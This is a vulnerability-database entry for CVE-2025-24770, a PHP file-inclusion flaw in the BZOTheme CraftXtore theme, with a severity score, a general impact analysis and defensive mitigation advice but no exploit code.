Skip to main content

CVE-2025-24770: CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') in BZOTheme CraftXtore

High
VulnerabilityCVE-2025-24770cvecve-2025-24770cwe-98
Published: Mon Jun 09 2025 (06/09/2025, 15:56:55 UTC)
Source: CVE Database V5
Vendor/Project: BZOTheme
Product: CraftXtore

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in BZOTheme CraftXtore allows PHP Local File Inclusion. This issue affects CraftXtore: from n/a through 1.7.

AI-Powered Analysis

AILast updated: 07/11/2025, 01:32:33 UTC

Technical Analysis

CVE-2025-24770 is a high-severity vulnerability classified under CWE-98, which pertains to improper control of filenames used in include or require statements within PHP programs. Specifically, this vulnerability affects the BZOTheme CraftXtore product, versions up to 1.7. The flaw allows for PHP Remote File Inclusion (RFI), enabling an attacker to include and execute arbitrary remote PHP code on the affected server. This occurs because the application does not properly validate or sanitize user-supplied input that determines the filename or URL to be included. As a result, an attacker can craft a malicious request that causes the server to fetch and execute code from an external source. The CVSS 3.1 base score of 8.1 reflects the critical impact on confidentiality, integrity, and availability, with network attack vector, no privileges required, no user interaction, but high attack complexity. Exploitation can lead to full system compromise, data theft, defacement, or use of the server as a pivot point for further attacks. Although no known exploits are currently reported in the wild, the nature of RFI vulnerabilities makes them attractive targets for attackers. The vulnerability was publicly disclosed on June 9, 2025, and affects all versions of CraftXtore up to 1.7, with no patch links currently available, indicating that users must apply mitigations or await vendor fixes.

Potential Impact

For European organizations using BZOTheme CraftXtore, this vulnerability poses a significant risk. Successful exploitation can lead to unauthorized remote code execution, resulting in data breaches, service disruption, and potential lateral movement within corporate networks. Given the high confidentiality and integrity impact, sensitive customer data, intellectual property, and internal systems could be compromised. The availability impact also means critical e-commerce or content management services powered by CraftXtore could be taken offline or manipulated, causing operational and reputational damage. European data protection regulations such as GDPR impose strict requirements on data security and breach notification, so exploitation could also lead to regulatory penalties and loss of customer trust. Organizations in sectors with high online presence, such as retail, media, and government services, are particularly vulnerable due to their reliance on web applications and potential attractiveness to attackers.

Mitigation Recommendations

Immediate mitigation steps include disabling any functionality that allows dynamic inclusion of files based on user input. Organizations should implement strict input validation and sanitization to ensure only allowed, local file paths are processed. Employing a whitelist approach for included files can prevent arbitrary file inclusion. Web application firewalls (WAFs) should be configured to detect and block suspicious requests attempting remote file inclusion patterns. Monitoring web server logs for unusual include or require requests can help identify exploitation attempts. Until an official patch is released, consider isolating affected systems and restricting outbound HTTP/HTTPS traffic to prevent fetching remote malicious code. Additionally, updating to newer versions of CraftXtore once available, or applying vendor-provided patches, is critical. Conducting a thorough security review of all PHP include/require usage in custom code is also recommended to prevent similar vulnerabilities.

Need more detailed analysis?Get Pro

Technical Details

Data Version
5.1
Assigner Short Name
Patchstack
Date Reserved
2025-01-23T14:53:16.440Z
Cvss Version
3.1
State
PUBLISHED

Threat ID: 68487f581b0bd07c3938a801

Added to database: 6/10/2025, 6:54:16 PM

Last enriched: 7/11/2025, 1:32:33 AM

Last updated: 8/8/2025, 10:55:58 AM

Views: 19

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats